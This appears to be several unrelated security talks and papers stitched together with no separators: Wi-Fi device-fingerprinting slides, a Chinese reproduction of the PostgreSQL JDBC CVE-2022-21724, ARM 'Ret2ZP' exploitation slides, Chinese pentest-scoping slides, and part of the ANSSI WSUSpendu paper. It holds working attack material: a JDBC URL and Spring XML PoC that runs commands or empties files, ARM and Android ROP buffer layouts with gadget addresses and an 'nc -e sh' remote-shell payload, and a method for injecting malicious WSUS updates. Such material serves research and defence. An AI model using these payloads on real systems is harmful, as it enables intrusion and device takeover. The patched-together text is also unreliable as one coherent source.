wifi4|probe:0,1,50,45,3,221(001018,2),221(00904c,51),htcap:110c,htagg:19,htmcs:000000ff|assoc:0,1,48,50,4 5,221(001018,2),221(00904c,51),221(0050f2,2),htcap:110c,htagg:19,htmcs:000000ff|os:roku Withings Scale wifi4|probe:0,1,50,45,3,221(001018,2),221(00904c,51),htcap:110c,htagg:19,htmcs:000000ff|assoc:0,1,48,50,4 5,221(001018,2),221(00904c,51),221(0050f2,2),htcap:110c,htagg:19,htmcs:000000ff|oui:withings Try It! SSID: SmellOfWifiTalk Mobile Only! Taxonomy identifies the Wi-Fi circuitry, device driver, and OS. ● Works for highly integrated devices: mobile and IOT. ● With a Wi-Fi card in a laptop... it identifies the card. Try It! SSID: SmellOfWifiTalk Uses of Wi-Fi Taxonomy Current ● List of Connected Clients in UI ● Correlate with other data Future ● Optimize for client ? ● WIDS ? Try It! SSID: SmellOfWifiTalk Current Status ● hostapd 2.7 added CONFIG_TAXONOMY. ○ hostapd_cli command: signature ● Database of known signatures: ○ https://github.com/NetworkDeviceTaxonomy/wifi_taxonomy ○ Mobile & IOT, not laptops/desktops ○ ~60% of connected Wifi devices Try It! SSID: SmellOfWifiTalk Other resources ● Published paper https://research.google.com/pubs/pub45429.html https://arxiv.org/abs/1608.01725 ● “Measuring wifi performance across all Google Fiber customers” Avery Pennarun, Netdev 1.1, 2015 https://youtu.be/yZcHbD84j5Y http://apenwarr.ca/diary/wifi-data-apenwarr-201602.pdf ● https://github.com/NetworkDeviceTaxonomy Try It! SSID: SmellOfWifiTalk
Vul of PostpreSql、Informic JDBC Driver 当程序中JDBC 连接 URL 可控时,可能会造成安全问题。HITB2021SIN 中的分享议题 "Make JDBC Attacks Brilliant Again" 列举出了H2、IBM DB2、MODEShape、Apache Derby、 SQLite等数据库Driver,在Connect URL可控情况下的安全问题。 ⼀、Postgresql CVE-2022-21724 近⽇披露了CVE-2022-21724,同样是在JDBC Connection URL可控情况下将会出现某些安 全问题。 当攻击者控制 jdbc url 或属性时,使⽤ postgresql 库的系统将受到攻击。pgjdbc 根据通过 `authenticationPluginClassName`、`sslhostnameverifier`、`socketFactory`、`sslfactory`、 `sslpasswordcallback` 连接属性提供的类名实例化插件实例。但是,驱动程序在实例化类之前 没有验证类是否实现了预期的接⼝。这可能导致通过任意类加载远程代码执⾏。 1.复现 Github提供POC如下: 可以看到是利⽤了Spring中的 org.springframework.context.support.ClassPathXmlApplicationContext类,这⾥搭建环境参 考Spring Boot Connect to PostgreSQL Database Examples 测试Demo DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org. package com.example.demo; /** * @auther Skay * @date 2022/2/18 0:18 * @description */ import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.CommandLineRunner; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.jdbc.core.BeanPropertyRowMapper; import org.springframework.jdbc.core.JdbcTemplate; import java.sql.Types; import java.util.List; import java.util.Map; @SpringBootApplication public class SpringJdbcTemplate2PostgreSqlApplication implements CommandLine 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 application.propertise 2.分析 简单看⼀下代码逻辑 org.postgresql.Driver#makeConnection 进⼊org.postgresql.jdbc.PgConnection类初始化逻辑 ——> oorg.postgresql.jdbc.PgConnection#PgConnection ——> org.postgresql.core.ConnectionFactory#openConnection ——> org.postgresql.core.v3.ConnectionFactoryImpl#openConnectionImpl 这⾥会进⼊关键⽅法org.postgresql.core.SocketFactoryFactory#getSocketFactory @Autowired private JdbcTemplate jdbcTemplate; public static void main(String[] args) { SpringApplication.run(SpringJdbcTemplate2PostgreSqlApplication.class } @Override public void run(String... args) throws Exception { Map<String, Object> map = jdbcTemplate.queryForMap("select * from tb System.out.println(map.toString()); } } spring.datasource.url=jdbc:postgresql:// spring.datasource.username=postgres spring.datasource.password=postgresql 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 1 2 3 4 有⼀个if else逻辑,从Properties中获取socketFactoryClassName,如果为空则return默认的 javax.net.SocketFactory,否则进⼊org.postgresql.util.ObjectFactory#instantiate逻辑 进⼊org.postgresql.util.ObjectFactory#instantiate,会进⼊newInstance逻辑初始化 socketFactory参⼊传⼊的 org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg 类,且初始化参数也可⽤socketFactoryArg参数指定 最终落地到 org.springframework.context.support.ClassPathXmlApplicationContext#ClassPathXmlAppli cationContext(java.lang.String) org.springframework.context.support.ClassPathXmlApplicationContext这条链在JackSon反 序列化漏洞中使⽤过(CVE-2017-17485) poc.xml 内容为 <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework. <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg value="calc.exe" /> 1 2 3 4 5 6 最终复现如下: 3.Other 按照这个思路,我们只需找到符合这样条件的⼀个类,public构造⽅法中有且只有⼀个String参 数,会造成⼀些敏感操作,这样找到了⼀个java.io.FileOutputStream,可以造成任意⽂件内容 置空 Poc如下:spring.datasource.url=jdbc:postgresql:// socketFactory=java.io.FileOutputStream=D:\tmp\aaa.txt 4.补丁 https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c 813 添加了代码逻辑验证该类是否实现了预期的接⼝ ⼆、参考链接: https://su18.org/post/jdbc-connection-url-attack/ https://paper.seebug.org/1832/ https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4 <property name="whatever" value="#{ pb.start() }"/> </bean> </beans> 7 8 9
Technique and bypassing defense mechanisms 07. 2010 STRI/Advance Technology Lab/Security Exploitation on ARM CONFIDENTIAL 2 # /usr/bin/whoami ● Itzhak (Zuk) Avraham ● Researcher at Samsung Electronics ● Partner at PIA ● Follow me on twitter under “ihackbanme” ● Blog : http://imthezuk.blogspot.com ● For any questions/talks/requests/whatever : CONFIDENTIAL 3 Presentation isn’t enough ● Get the full paper! Should be in the CDs under the name: Itzhak Zuk Avraham.* ● This presentation and a full disclosure paper can be found at the following URL : ● http://imthezuk.blogspot.com CONFIDENTIAL 4 Outline ● [+] Exploitation on X86 vs. ARM ● [+] ARM calling convention (APCS) ● [+] Why simple ret2libc will not work? ● [+] Understanding the vulnerable function ● [+] Adjusting parameters ● [+] Controlling the PC ● [+] Ret2ZP (Return To Zero Protection) - For Local Attacker ● [+] Ret2ZP (Return To Zero Protection) - Attack Explained in Depth (For Remote Attacker) ● [+] Ret2ZP - Registers/Variable values injections. ● [+] Ret2ZP - Using the attack to enable stack. # whoami root CONFIDENTIAL 5 Remote Local by Apps SMS/Calls Zombie Phone? More Privilege escalation Introduction - Why to hack into a phone? Zombie Phone? SMS/Calls Privilege escalation More Local by phone holder Privilege escalation CONFIDENTIAL 6 Stack based BO on X86/ARM ● Current status on BO on X86 ● Stack/Heap is not executable ● Stack cookies, ASLR, etc… ● On ARM? ● Almost no protection. ● Architecture is different. ● Stack/Heap are not executable on most devices CONFIDENTIAL 7 X86 Ret2Libc Attack ● Ret2LibC Overwrites the return address and pass parameters to vulnerable function. ● [+] EBP+4 will store a function we want to call. ● [+] EBP+8 Will store the exit function as its pushed to the called function. ● [+] EBP+12 Will contain the pointer to the parameters we want to use on the called function. ● We’ll use the “system” function, as it’s easy to use/understand and only get 1 parameter. CONFIDENTIAL 8 Why it wouldn’t work on ARM? ● In order to understand why we have problems using Ret2Libc on ARM with regular X86 method we have to understand how the calling conventions works on ARM & basics of ARM assembly CONFIDENTIAL 9 ARM Assembly basics ● ARM Assembly uses different kind of commands from what most hackers are used to (X86). ● It also has it’s own kind of argument passing mechanism (APCS) ● The standard ARM calling convention allocates the 16 ARM registers as: ● r15 is the program counter. ● r14 is the link register. ● r13 is the stack pointer. ● r12 is the Intra-Procedure-call scratch register. ● r4 to r11: used to hold local variables. ● r0 to r3: used to hold argument values to and from a subroutine. ● We need to re-invent the wheel from the beginning to exploit on ARM  CONFIDENTIAL 10 ARM Ret2Libc Attack ● Ret2LibC Overwrites the return address and pass parameters to vulnerable function. But wait… Parameters are not passed on the stack but on R0..R3. ● Oops, we’re screwed. ● We can only override existing variables from local function. ● And PC (Program-Counter == EIP in X86) ● So there’s no - ”Ret2Libc” for us on ARM, we’ll have to make some adjustments. CONFIDENTIAL 11 Why is it possible? ● Theory (shortly & most cases): ● When returning to original caller of function, the pushed Link-Register (R14) is being popped into Program Counter (R15). ● If we control the Link-Register (R14) before the function exits, we can gain control of the application! CONFIDENTIAL 12 First PoC – On maintained R0 ● Saved R0 passed in buffer CONFIDENTIAL 13 First PoC – On maintained R0 ● Sometimes we can maintain the parameters passed on the stack on use them for our own (on R0 register). In some cases we’ll use a Return Oriented Programming to control the flow of the functions to execute our shell-code, step-by-step. ● In the following PoC, we’ll use a function that exits after the copy of the buffer is done and returns no parameters (void), in-order to save the R0 register to gain control to flow without using multiple returns. CONFIDENTIAL 14 Real life scenario! ● Let’s face it, keeping the R0 to point to beginning of buffer is not a real life scenario – it needs the following demands : ● Function returns VOID. ● There are no actions after overflow (strcpy?) [R0 will be deleted] ● The buffer should be small in-order for stack not to run over itself when calling SYSTEM function. (~16 bytes). ● There’s almost no chance for that to happen. Let’s make this attack better. CONFIDENTIAL 15 Successful exploitation requirements? ● Parameter adjustments ● Variable adjustments ● Gaining back control to PC ● Stack lifting ● RoP + Ret2Libc + Stack lifting + Parameter/Variable adjustments = Ret2ZP ● Ret2ZP == Return to Zero-Protection CONFIDENTIAL 16 Ret2ZP for Local Attacker ● How can we control R0? R1? Etc? ● We’ll need to jump into a pop instruction which also pops PC or do with it something later… Let’s look for something that … ● After a quick look, this is what I've found : ● For example erand48 function epilog (from libc): 0x41dc7344 <erand48+28>: bl 0x41dc74bc <erand48_r> 0x41dc7348 <erand48+32>: ldm sp, {r0, r1} <==== WE NEED TO JUMP HERE. Let's make R0 point to &/bin/sh 0x41dc734c <erand48+36>: add sp, sp, #12 ; 0xc 0x41dc7350 <erand48+40>: pop {pc} ====> We'll get out here. Let's make it point to SYSTEM. Meaning our buffer will look something like this : AA…A [R4] [R11] &0x41dc7344 &[address of /bin/sh] [R1] [4bytes of Junk] &SYSTEM CONFIDENTIAL 17 Ret2ZP – Remote attacker ● By using relative places, we can adjust R0 to point to beginning of buffer. R0 Will point to * ● We can run remote commands such as : Nc 80 –e sh ***Don’t forget to separate commands with # or ; because string continue after command  Meaning our buffer will look something like this : *nc 80 –e sh;#…A [R4] [R11] &PointR0ToRelativeCaller … [JUNK] [&SYSTEM] CONFIDENTIAL 18 Ret2ZP – Remote Attacker – Abusing current StackPointer ● Arghh… It doesn’t work. For short buffer we only got DWORD of un-written commands, for long buffer we got none, un-less certain specific commands happened. ● We need to lift the stack! Or point it to other writeable region. ● ARM commands are making our life easier. There are many variations of commands that can adjust a register. CONFIDENTIAL 19 Ret2ZP – Remote Attacker – Abusing current StackPointer ● This is an example of a simple way to adjust stack, but other methods are preferred such as moving SP to writeable location. ● Let’s take a look of wprintf function epilog : 0x41df8954: add sp, sp, #12 ; 0xc 0x41df8958: pop {lr} ; (ldr lr, [sp], #4) <--- We need to jump here! ; lr = [sp] ; sp += 4 0x41df895c: add sp, sp, #16 ; 0x10 STACK IS LIFTED RIGHT HERE! 0x41df8960: bx lr ; <--- We'll get out, here :) 0x41df8964: .word 0x000cc6c4 ● Enough lifting can be around ~384 bytes [from memory] ● Our buffer for 16 byte long buffer will look like this: ● “nc 80 –e sh;#A..A” [R4] [R11] 0x41df8958 *0x41df8958 [16 byte] [re-lift] [16 byte] [re-lift][16 byte] …. [R0 Adjustment] [R1] [Junk] [&SYSTEM] CONFIDENTIAL 20 Ret2ZP – Remote Attacker – Parameter Adjustments ● Another interesting parts to adjust params: ● Mcount epilog: ● 0x41E6583C mcount ● 0x41E6583C STMFD SP!, {R0-R3,R11,LR} ; Alternative name is '_mcount' ● 0x41E65840 MOVS R11, R11 ● 0x41E65844 LDRNE R0, [R11,#-4] ● 0x41E65848 MOVNES R1, LR ● 0x41E6584C BLNE mcount_internal ● 0x41E65850 LDMFD SP!, {R0-R3,R11,LR} <=== Jumping here will get you to control R0, R1, R2, R3, R11 and LR which you'll be jumping into. ● 0x41E65854 BX LR ● 0x41E65854 ; End of function mcount CONFIDENTIAL 21 Ret2ZP – Remote Attacker – Parameter Adjustments ● Enable stack and execute whatever you want! All of this can be easily used to enable stack by calling mprotect() and jumping back to shellcode. For more complex shellcodes (please refer to reference section on Pharck magazine Alphanumeric ARM shellcodes). CONFIDENTIAL 22 Ret2ZP – Android ● Let’s see if we can root an Android phone: ● Limitations ● Okay, Let’s do it! ● Andorid libc… mmm ● What do we need to know : ● Compiled differently from libc here ● Different flags, but same technique works. ● No getting things to R0 immediately? (pop R0)… Let’s get it! ● /bin/sh  /system/bin/sh CONFIDENTIAL 23 Ret2ZP – Android ● Don’t worry, it’s all the same (more. or less)… ● Let’s get : “/system/bin/sh” to R0. No pop R0 at all, so let’s do a trick. Check this lines of code : mallinfo STMFD SP!, {R4,LR} MOV R4, R0 BL j_dlmallinfo MOV R0, R4 LDMFD SP!, {R4,PC}  Let’s jump here and store address of /system/bin/sh on R4! ; End of function mallinfo CONFIDENTIAL 24 Ret2ZP – Android ● Now let’s get R4 to R0 mallinfo STMFD SP!, {R4,LR} MOV R4, R0 BL j_dlmallinfo MOV R0, R4  (2nd Jump) We’ll need to jump here now. LDMFD SP!, {R4,PC}  (1st Jump) ; End of function mallinfo ● I.e : AA...A \xd8\x93\xe0\xaf &/system/bin/sh \xd4\x93\xe0\xaf junk &system CONFIDENTIAL 25 Ret2ZP – Summary ● Buffer overflows on ARM are real threat and the more security mechanisms set, the better. Some needs to be ported to ARM and some are already available. ● Never say never, you only need one security hole to gain control of a device, use the most protections you can. CONFIDENTIAL 26 Ret2ZP – Prevention ● Not a single un-randomized static code ● Cookies ● Multiple vectors CONFIDENTIAL 27 Questions? ● Questions? Holly, Carpe Diem CONFIDENTIAL 28 Questions? ● Questions? ● Itzhak (Zuk) Avraham ● Researcher at Samsung Electronics ● My details for further questions: ● Follow me on twitter under “ihackbanme” ● Blog/Full Paper/Presentation:http://imthezuk.blogspot.com ● My Email: (Special offers/questions/comments…): CONFIDENTIAL 29 Thanks! ● Ilan (NG!) Aelion - Thanks Ilan, Couldn't have done it without you; You're the man! ● Moshe Vered - Thanks for the support/help! ● Matthew Carpenter - Thanks for your words on hard times. CONFIDENTIAL 30 References ● Full paper is posted at my blog : http://imthezuk.blogspot.com ● Phrack magazine p66,0x0c – Alphanumeric ARM Shellcode (Yves Younan, Pieter Philippaerts) ● Phrack magazine p58,0x04 – advanced ret2libc attacks (Nergal) ● Defense Embedded Systems Against BO via Hardware/Software (Zili Shao, Qingfeng Zhuge, Yi He, Edwin H.-M. Sha) ● iPwnning the iPhone : Charlie Miller ● ARM System-On-Chip Book : Awesome! By Stever Furber – Like the bible of ARM. ● Understanding the Linux Kernel – by Bovet & Cesati CONFIDENTIAL 31 Thank You! 감사합니다!
安全测试中 一些有趣的姿势和技巧 Fresh business general template Applicable to enterprise introduction, summary report, sales marketing, chart data gdygdy ID gdygdy 程序猿转行安全 多年搬砖背锅经验,目前在练习甩锅 曾经在多个SRC和漏洞平台打酱油 每天专心撸铁 自我介绍 聊些什么? 测试中那些总被忽略的目标 目 标 哪些目标? APP 移动APP应用 微信 微信公众号,小程序 QQ QQ公众号 支付宝 支付宝生活号、小程序 移动APP来源 安卓应用市场 AppStore 苹果企业证书安装 iOS应用 App Store 同开发者旗下APP iOS应用 扩大目标范围 I. 子业务 II. 分公司 III. 收购的业务 IV. ……… 微信 微信公众号+小程序 微信 微信 QQ QQ 搜索公众号 下方菜单以及消息 支付宝生活号 支付宝 支付宝小程序 生活号入口 总入口 搜索 结束 上面介绍的这些够了吧? 01 社交功能 02 其他相关公众号 04 ………………… 03 APP的不同版本 如何获得更多的目标? 社交功能 其他相关公众号、小程序 APP的不同版本 APP历史版本 其他版本 还有什么? 几个解决问题的技巧 技 巧 技巧1 2 3 技巧1 2 3 技巧1 2 3 难题 解决办法? 逆向思考 解决办法? 思考结果 修改目标参数的上一步返回数据值 感谢观看
WSUSpendu ANSSI Romain Coltel Romain.Coltel@Alsid.eu Yves Le Provost Yves.Le-Provost@ssi.gouv.fr 2 WSUSpendu Contents Introduction 5 WSUS and network architecture 7 1.1 Architectures presentation 7 1.2 Auto approved updates 10 1.3 State of the art - WSUSpect and technical limitations 11 WSUS internals 13 2.1 IIS Webservice 13 2.2 Database 15 2.3 WSUS service 15 Injecting a new update 17 3.1 Interaction with the database 17 3.2 Update metadata 17 3.3 Update’s binary upload 20 3.4 Injecting in the database 21 3.5 Targeting a specific client 22 3.6 Update deployment 22 Introducing WSUSpendu 23 Auditing WSUS 25 Microsoft network architecture issues 27 6.1 Administration principles 27 6.2 One WSUS server for multiple forests 27 6.3 A WSUS server for a disconnected network 28 Recommendations 29 7.1 Securing the WSUS service itself 29 3 WSUSpendu 7.2 Multiple WSUS servers architectures 29 7.3 Disconnected networks case 30 Conclusion 31 Bibliography 33 4 WSUSpendu Introduction WSUS is a Microsoft service that deploys updates on the computer park depending on the organization’s needs, which is essential for a secured infrastructure. Easy to use and to install, it is possible to adapt it according to the different patch policy of every organization. However, the service’s purpose is to install softwares (patches in that case) on a large number of operating systems. Thus it is easy to understand that a misuse of its legitimate functionality could be critical for the network security. Such a case has been presented by Paul Stone and Alex Chapman during Black Hat 2015 [3]. Their presentation resulted on the provision of a new tool named WSUSpect. This tool was created to exploit a MITM attack and to inject an additional and malicious update in the connection between client and server. However, an attacker will not always be able to use this tool, especially if network protections have been configured. In another case, an update server could be placed at the border of the network (to distribute update to this other network). Thereby, the method used by WSUSpect will fail. The purpose of this article is to demonstrate the different problems the usage of WSUS presents. The functionalities and the server position in the network could lead to a dangerous situation. We will first present the different elements used by the service. In a second time, we will approach a method to circumvent the limitations of WSUSpect if the WSUS server is compromised. A new tool will be proposed. This tool uses the technique of direct injection of updates in the WSUS service rather than in the network flow, to avoid the network restrictions. After that, we will detail the WSUS service in the audit point of view. Indeed, a major issue in patch management audit process is to collect the states of the updates on every system. These states must be coherent. Direct access on the WSUS server allows us to circumvent these limitations. Studying WSUS and its architecture leads to the elaboration of audit scripts in order to automatize the collection of information. Finally, we will return to the various problems of WSUS, particularly with regards to its critical positioning in the architecture. These new perspectives will lead to the elaboration of a recommended architecture in order to protect domain controllers, which are potential clients of a WSUS server. 5 WSUSpendu WSUS and network architecture This part presents the different architectures with a WSUS server. These architectures are commonly used and their choices depend on the complexity and the nature of the network and if it is connected or not to Internet. 1.1 Architectures presentation Each architecture presented in this part contains at least one WSUS server. The case of clients without WSUS subscription, e.g. directly connected to the Windows Update server, is not dealt with in this article. Except this last example, the most common con- figuration is the one where there is only one update server (see figure 1.1). This server updates its own clients and is connected to Internet to obtain the patch from Microsoft servers. Communication between the WSUS server and Windows Update servers must use the HTTPS protocol (this configuration point is not editable). The SSL certificate is checked by the WSUS server in order to avoid malicious updates by spoofing legitimate servers. Clients obtain their updates with the WSUS server according to the server con- figuration: using the HTTPS protocol if the server is configured with SSL, or the HTTP protocol if not. Configuring the HTTPS protocol in an enterprise environment is not that easy, and this situation will be explained later (see section 1.3). Microsoft Update Internet Serveur WSUS Clients WSUS Figure 1.1: Architecture WSUS simple A bigger organization, with multiple geographical sites for example, will use more than one WSUS server. In this case, a tree architecture will be used (see figure 1.2). An up- stream server is connected to Internet. Other WSUS servers, named « replica », spread 7 WSUSpendu updates for one site or one subnetwork. It is also possible to use this kind of architec- ture with autonomous system. In this case, updates are copied but not automatically approved as they are with the replicas case. Upstream and downstream concept appear here in this architecture: • An upstream server is a server that provides its updates to another WSUS server (Each WSUS server will ultimately depend of the Microsoft upstream server: Windows Update server. • A downstream server is a server that receives the updates from an upstream server. Microsoft Update Internet Serveur WSUS Replica Replica Domaine B Domaine A Figure 1.2: WSUS servers with replicas These two architectures are recommended by Microsoft. However, they are not suffi- cient for certain organizations. Two other architectures can be observed. The first one is often seen in relatively large companies: it has several domains or forests which are not necessarily connected by trust Active Directory relationships. In these architectures, we often see shared servers for the support functions. Although domains have no relationships, update servers often have a common link: the WSUS server of one of the domains is used as a reference to the other network’s WSUS server (with the use of replicas) (cf. figure 1.3). The aim is to limit the bandwidth and the time used to retrieve updates from the Windows Update server. Indeed, synchronization with the Microsoft server is often very long. With this architecture, there could be a potential control of one forest’s WSUS server over another forest’s WSUS server. This relationship is described in section 3.6. The last architecture presented in this article comes from a special case: the discon- nected network. This case is very specific since it links two security issues: updates and 8 WSUSpendu Microsoft Update Internet Serveur WSUS Replica Domaine B Domaine A Figure 1.3: WSUS architecture with servers dependencies between domains confidentiality. If the network is disconnected it usually is because of its sensitivity (data confidentiality, network sensitivity and safety, for example in case of industrial networks). Network segregation must therefore provide additional security to the connected net- work. However, this segregation should be only an additional barrier in the network protection and should not be used as a pretext for lower security measures. Therefore, the update process need to continue. In this case, this cannot be done without an In- ternet connection. Updates are therefore one of the few vectors of data injection from a network connected to the Internet to the disconnected network. If it is possible to use the updates to inject malicious code, then there is a takeover relationship of these networks, and only the data-extraction part is missing. Microsoft has planned for this use-case. In this way, the update process relies on the use of two WSUS servers. One of them is installed on the connected network (named WSUS export server in this case), the other one is installed on the disconnected network (named WSUS import server). The connected server takes its update in the normal form (however, be aware of the method of synchronizing update binaries that must be downloaded immediately and not only when they are approved). All data must then be transferred to the WSUS import server using the following method: • the directory containing the updates must be saved and transferred to the import server. This directory is used in particular by the IIS server (see section 2.1); • metadata contained in the WSUS database (see section 2.2) must be exported with the help of the wsusutil tool (see listing 1.1). The resulting files and must be copied from the export server to the import server. • metadata is then injected into the import server, again using the wsusutil tool. 9 WSUSpendu Listing 1.1: Usage of wsusutil to export metadata This process is relatively time-consuming and needs a lot of processing to transfer the data. As an example, Microsoft announces an operation taking between 3 and 4 hours. It is therefore often abandoned by system administrators in favor of two other solutions. The first solution uses the WSUSoffline tool [1]. This tool has the advantage of automatically performing the transfer preparation from one server to another. The data then only has to be copied between the two servers. Handling is therefore greatly facilitated. However, this opensource tool is not edited by Microsoft. It is therefore often behind the functionalities of the operating systems and the WSUS service itself. For instance, the version at the time of writing does not yet support Windows 10 nor Windows Server 2016. This solution is therefore not entirely satisfactory. An alternative approach consisting on using virtualization, where only one server is used, is more often deployed. Indeed, the WSUS server, which is linked to the network connected to the internet, is updated in a normal way. Its characteristic is being a virtual machine that will be cloned and installed subsequently on the disconnected network. That way, updates and their metadata are ready to be broadcast on the disconnected network. In this case, the installed systems within this network haven’t been approved by the WSUS server. However, this registration is performed without any human intervention; either the WSUS server automatically adds -without restriction- any machine that can be attached to the WSUS server on a default group, or the client’s attachment can be specified by a GPO configuration. In this case, clients will be created when necessary. These groups can then receive the approved updates and the administrator can modify and validate them to the specific needs as in any WSUS server. 1.2 Auto approved updates For all these architectures, it is possible to manually push any appliance software up- dates suggested by Microsoft after the testing and evaluation process. But it is also possible to automatically apply updates according to certain criteria. When installing WSUS, a rule, which is disabled by default, is created and allows, when activated, to accept automatically the installation of all the ”critical” or ”security” updates on WSUS clients, among other classifications. Automatic deployment rules can be configured to select any update classification for any product class. For example, we can choose to accept automatically the ”critical” updates for all the Windows 7 servers. 10 WSUSpendu Microsoft Update Internet Serveur WSUS Domaine B Domaine A Serveur WSUS clone Figure 1.4: WSUS architecture in disconnected network Furthermore, WSUS server updates and revisions to an already validated update are automatically approved by default. In addition, as detailed in the section 2.2, the WSUS service heavily relies on the database. This database uses a number of triggers activated by certain events, such as when inserting data into tables, to verify the integrity and consistency of the data. It is possible to create new database entries that can allow an attacker to add an update, to approve an update or to make an update ineffective by modifying its metadata. 1.3 State of the art - WSUSpect and technical limitations Few attacks exist to date on the Windows update mechanism. Only Paul Stone and Alex Chapman’s presentation at BlackHat USA 2015 [3] sheds light on the sensitivity of this process as well as the importance of controlling an update, or at least a part of it. For the WSUSpect to work, the client has to use the attacker’s machine as a proxy. One of the way for performing this attack is for a (non privileged) user on the client to set up the proxy. Another way to perform this attack is to use the WPAD protocol. It is possible to perform a man in the middle attack between the client and the WSUS server in order to inject a malicious update. SOAP (Simple Object Access Protocol) over HTTP is used between the client and the server. These protocols can be encapsulated within an SSL/TLS layer as any HTTP connection. In this latter case, the encryption process 11 WSUSpendu requires the deployment of a public key infrastructure (PKI) within the company which is not performed usually. However, the attack requires a non encrypted network stream to be successful. WSUSpect is simple as it intercepts an update request from a client and tampers with it to add its malicious update. The server’s response is modified by inserting metadata and binaries to attempt to execute arbitrary code on the client. The WSUS process needs to have signed binary to accept an update. The Trusted Root Certificates and the Trusted Publishers stores of the local machine are used to check the signature. With this configuration it is not possible to modify an update by injecting an arbitrary binary. Nevertheless, the command arguments are not included in the signature check. Thus, it is possible to use a signed binary and to modify its argu- ments in order to execute some commands. Interesting binaries available on Windows (cmd.exe, wmic.exe, and so on) to execute commands have their signature in a catalog and not as a part of the binary. Consequently they are rejected by WSUS service. To circumvent this limitation, WSUSpect used PsExec and BGInfo from the Sysinternal suite and signed by Microsoft. These tools could execute arbitrary commands through their arguments. WSUSpect attacks the update process between WSUS server and clients. No method currently exists to attack the update process between two WSUS servers. 12 WSUSpendu WSUS internals WSUS service works with three components: • an IIS Web server for the exchanges with clients and downstream servers; • a database (could be local or remote) where the metadata are stored; • a central service that manages the updates and interacts with the two other components. Studying the service is possible for a large part by using the SQL Server Management Studio (SSMS) tool from Microsoft. Nevertheless, this tool needs to be installed before the WSUS service. Then the Profiler tool in SSMS is awesomely useful to trace database calls. Finally, the WSUS service is written in C# language thus it is possible to use a classical .NET decompiler to understand its functionalities. 2.1 IIS Webservice An IIS server, split in two parts, is used to deal with the clients. The first part is a Webservice. It is in charge of delivering metadata to clients. The second part is using the BITS (Background Intelligent Transfer Service) protocol to transfer the binary’s updates (like CAB files, PSF or EXE) to the clients. The Webservice use the SOAP protocol to manage the new clients then to interact with them to negotiate the new updates to install. Two main request/response groups are used by the Webservice. The first one allows a new client to register in the WSUS server by declaring its configuration, negotiate session cookie, etc. (cf. request). The following methods are used (cf. figure 2.5): • ; • ; • ; • . These requests/responses are not authenticated and no control is performed on which client is asking for information. Thus all clients could register in a WSUS server. Never- theless, authentication is possible by using TLS client certificates but this configuration is not widely present as per our security assessment experience. Studying data exchanged between clients and the Webservice could be complicated due to the data compression. But this configuration can be modified with the help of the IIS MMC. The second part of the Webservice exchanges allows a client to declare to the WSUS 13 WSUSpendu Figure 2.5: SOAP protocol between WSUS clients and the server [6]. Client WS, Sim- pleAuth WS and SelfUpdate Tree are three Webservice components for the different requests/responses server the status of its software updates (including the update agent himself). After that, the client declares the status of its hardware updates (which drivers are installed, for instance). With these pieces of information, the server could propose to the client the available updates. Two methods are used for this goal: • : calls for the software part (multiple calls could be necessary in case of having a lot of updates to transfer), and calls for the drivers part (but only one call in this case); • . Updates are then downloaded by the clients only when they ask for them. The download process uses the BITS protocol to avoid network congestion. Binaries are stored in the IIS WsusContent directory. On the client side, binaries are stored in the directory. 14 WSUSpendu 2.2 Database When installing the WSUS role, you can choose between two types of databases: either use an already installed SQL Server or create a local WID (Windows Internal Database), which is a lightweight SQL Server. In both cases, the default database name is SUSDB, and there is no difference in its internal architecture. The only difference is the connec- tion method: • the access to the full SQL Server is done as usual, through either a TCP socket or a named pipe, using Windows or mixte authentication, and so on; • the access to the WID is done only through the use of a named pipe, by default using the Windows authentication. The database is composed of relational tables containing the full configuration of the WSUS server (even the configuration needed to connect to this database), the updates metadata, the registered clients list and their configuration, and so on. A lot of triggers, checking for data consistency, govern the insertion into these tables. Therefore, a brutal insertion into a random table has a great level of chance to be refused by one of these triggers. Moreover, a lot of relationships between tables are established using foreign keys, which complexifies again the direct insertion through SQL queries. However, around three hundred stored procedures can be used to manipulate SQL data in a usable way. These procedures query the database in the right order, dispatching calls to respect triggers as well as foreign keys constraints, and modify some metadata to better fit into some tables. For instance, only one stored procedure is used in order to approve an update, while it manipulates around ten tables (insert, update and delete operations). The database is really the core of the WSUS server. Communications streams with the WSUS clients are generated from the information stored in it. It also contains URLs where the binary linked to the updates can be found, indexes of the files contained in the IIS Webserver folder (known as WsusContent) that can be given to the clients when asked to. All the data displayed in the WSUS console (in an MMC snap-in) also come from the database. Every click in this console results in the call of at least one stored procedure, which selects or updates the database accordingly. This is therefore a strategic place where to manipulate data, including inserting new data to try and compromise WSUS clients and selecting existing data to perform a security assessment. 2.3 WSUS service The WSUS service () manages both the aforementioned components. It interacts with the administrators through the WSUS console, which is an MMC snap-in. Its behavior is simple as well as crucial for the WSUS server. It schedules most of the stored procedures of the database needed to manage updates. As soon as the service is started, it checks everything is fine on the WSUS server: it 15 WSUSpendu gets the configuration from inside the database, it tests if the other two components are installed and configured properly, it puts a mutex on the database not to have two services to modify the database concurrently. Then it launches what will manage the service’s life: • HealthMonitoringThreadManager: it will check the database, clients, Web- service and certificate states. Its presence is useful to ensure everything is func- tional. To signal this state, it runs every five seconds the spUpdateServerHealth- Status database’s stored procedure; • DispatchManagerDatabasePollingThreadProc: it will allow the service to be managed. Three stored procedures, spGetNotificationEventNamesToWakeUp- OnStartup (at launched time) or spGetNotificationEventNamesToWakeUp and spGetChangeTrackingInformation, are used to follow the database’s changes. For instance, when configuration changes are detected, this thread will detect it and reconfigure the WSUS service automatically by updating the appropriate ta- bles. A raised event is also detected by these procedures, returned to the service, which then will run the appropriate stored procedure depending on the received event. This thread checks for changes every second to ensure -kind of- a smooth experience. One of the functionality of the service is to deal with MMC’s user interactions. In the case of a change of the configuration through the MMC, or using any other user in- terface functionality, a call to one of the functions of the service is performed. Most of these functions are really simple as they perform one task: call the appropriate stored procedure which will deal with the 